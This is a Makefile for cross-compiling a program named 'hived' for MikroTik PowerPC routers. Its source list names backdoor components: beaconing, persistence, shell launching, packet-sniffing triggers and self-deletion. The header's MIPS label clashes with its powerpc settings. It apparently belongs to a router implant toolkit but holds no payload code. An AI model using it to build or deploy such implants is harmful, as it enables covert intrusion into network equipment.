#------------------------------------------------
#Makefile for compiling MikroTik MIPS BE
# Makefile.mikrotik-mipsbe
#
# For other possible targets, please enter:
#	
#		make all
#
#------------------------------------------------

BUILDROOT=/opt/buildroot/buildroot-2010.11-ppc/output/staging/usr
ARCH=powerpc
BUILDTOOLS=$(BUILDROOT)/bin
UCLIBC_HDRS=$(BUILDROOT)/include
UCLIBC_LIBS=$(BUILDROOT)/lib
CC=${BUILDTOOLS}/$(ARCH)-linux-gcc
STRIP=${BUILDTOOLS}/$(ARCH)-linux-sstrip

BIN = .
LIB = .

SERVER_BASENAME = hived
SERVER=$(SERVER_BASENAME)-mikrotik-ppc

POLARSSL = polarssl
BZIP2 = bzip/bzip2-1.0.6
INCLUDES = -I $(UCLIBC_HDRS) -I$(POLARSSL)/include -I$(BZIP2) -I../libs
LIBPOLARSSL = $(POLARSSL)/library/libpolarssl.a
LIBBZIP2 = $(BZIP2)/libbz2.a

SERVER_SRCS = beacon.c persistence.c launchshell.c \
	shuffle.c twofish.c farm9crypt.c jshell.c \
	survey_mac.c survey_uptime.c trigger_listen.c trigger_callback_session.c daemonize.c \
	main.c init_strings.o string_utils.o tiny_crc16.c \
	trigger_b64.c trigger_payload.c trigger_sniff.c run_command.c \
	client_session.c threads.c self_delete.c $(POLARSSL)/crypto.c $(LIBPOLARSSL) \
	get_data.c process_list.c netstat_an.c netstat_rn.c ifconfig.c compression.c $(LIBBZIP2)

CFLAGS = -Wall -Wextra -ansi -std=gnu99
CFLAGS += -L$(UCLIBC_LIBS) -Os -lpthread -lutil
CFLAGS += $(INCLUDES) -D_IPCONFIG -D_NETSTAT_AN -D_NETSTAT_RN -D_PS_EF -DLINUX -DUCLIBC -D_USE_ASH -D_PPC -D_GNU_SOURCE
CFLAGS += -DMIKROTIK

DBGFLAGS += -DDEBUG -D_DEBUG -g

#STRIPFLAGS += --strip-all --remove-section=.comment --remove-section=.note

OS = $(shell uname)

ifdef	STATIC
CFLAGS += -static
endif

.PHONY: all
all: $(SERVER) $(SERVER)-dbg

polarssl: $(LIBPOLARSSL)

$(LIBPOLARSSL): strings
	cd $(POLARSSL)/library && $(MAKE) -f Makefile.mikrotik-ppc

bzip:   $(LIBBZIP2)

bzip2:  $(LIBBZIP2)

$(LIBBZIP2):
	cd $(BZIP2) && $(MAKE) -f Makefile.mikrotik-ppc libbz2.a

.PHONY: debug
debug: $(LIBPOLARSSL) $(SERVER)-dbg

.PHONY: release
release: $(LIBPOLARSSL) $(SERVER)

$(SERVER): strings $(LIBPOLARSSL) $(LIBBZIP2)
	$(CC) $(CFLAGS) $(COMMON_SRCS) $(SERVER_SRCS) -L$(LIB) -o $(BIN)/$(SERVER)
	$(STRIP) $(BIN)/$(SERVER)
	md5sum $(BIN)/$(SERVER) > $(BIN)/$(SERVER).md5

$(SERVER)-dbg: strings $(LIBPOLARSSL) $(LIBBZIP2)
	$(CC) $(CFLAGS) $(DBGFLAGS) $(COMMON_SRCS) $(SERVER_SRCS) -L$(LIB) -o $(BIN)/$(SERVER)-dbg
	md5sum $(BIN)/$(SERVER)-dbg > $(BIN)/$(SERVER)-dbg.md5

.PHONY: strings
strings: init_strings.o string_utils.o

init_strings.o: init_strings.c string_utils.o
	$(CC) -c init_strings.c

init_strings.c: server_strings.txt string_utils.h
	python mod_gen_string_header.py server_strings.txt SERVER_STRINGS

string_utils.o: string_utils.h string_utils.c
	$(CC) -c string_utils.c 

.PHONY: clean
clean:
	make -f ./Makefile clean

.PHONY: svnclean
svnclean: clean

.PHONY: md5
md5: all
	md5sum $(BIN)/$(SERVER)-dbg > $(BIN)/$(SERVER)-dbg.md5
	md5sum $(BIN)/$(SERVER) > $(BIN)/$(SERVER).md5

.PHONY: tarball	
tarball:
	make -f ./Makefile tarball
